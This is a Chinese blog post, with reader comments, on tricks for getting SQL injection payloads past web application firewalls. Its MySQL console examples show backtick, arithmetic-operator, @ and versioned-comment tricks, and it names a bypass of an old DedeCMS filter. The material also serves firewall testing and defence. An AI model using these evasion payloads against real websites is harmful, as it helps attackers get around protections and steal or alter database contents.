waf 绕过的技巧

研究过国内外的waf。分享一些 奇淫绝技。

一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

Mysql

tips1: 神奇的 `  (格式输出表的那个控制符)

过空格和一些正则。

[cce]mysql> select`version`()
-> ;
+———————-+
| `version`() |
+———————-+
| 5.1.50-community-log |
+———————-+
1 row in set (0.00 sec)
[/cce]

一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

[cce]mysql> select id from qs_admins where id=1;`dfff and comment it;
+—-+
| id |
+—-+
| 1 |
+—-+
1 row in set (0.00 sec)
[/cce]

usage : where  id =’0’`’xxxxcomment on.

tips2:神奇的- + .

[cce]mysql> select id from qs_admins;
+—-+
| id |
+—-+
| 1 |
+—-+
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;
+———-+
| +id-1+1. |
+———-+
| 1 |
+———-+
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+———-+
| -id-1+3. |
+———-+
| 1 |
+———-+
1 row in set (0.00 sec)
[/cce]

(有些人不是一直在说关键字怎么过?过滤一个from …    就是这样连起来过)

tips3: @

[cce]mysql> select@^1.from qs_admins;
+——|+
| @^1. |
+——|+
| NULL |
+——|+
[/cce]

这个是bypass  曾经dedeCMS filter .

或者这样也是ok.

tips4:mysql function() as xxx  也可以不用as 和空格

[cce]mysql> select-count(id)test from qs_admins;
+——|+
| test |
+——|+
| -1 |
+——|+
1 row in set (0.00 sec)
[/cce]

tips5:/*![>5000]*/ 新构造  版本号(这个可能有些过时了。)

[cce]mysql> /\*!40000select\*/ id from qs_admins;
+—-+
| id |
+—-+
|  1 |
+—-+
1 row in set (0.00 sec)
[/cce]

先分享这么多,哈。

Comment

评论:谢谢分享,收藏了

评论:Mark

评论:绕过啊绕过

评论:CTF中的一道题对sqlite_master进行了过滤. 该如何过呢? 大小写 十六进制试过了不行哦, substr()在from里用不了

评论:很赞呀

评论:mark

评论:真心不错~~

评论:一段可以用于防火墙安全测试的fuzz程序 http://zone.wooyun.org/content/1798 用这种方法可以找出好多诡异的不影响语法解析但是影响正则判断的字符

评论:怪不得我心理测试都不正常。。哈哈

评论:能想出这些方法的人思维真心变态。

发表评论

电子邮件地址不会被公开。 必填项已用*标注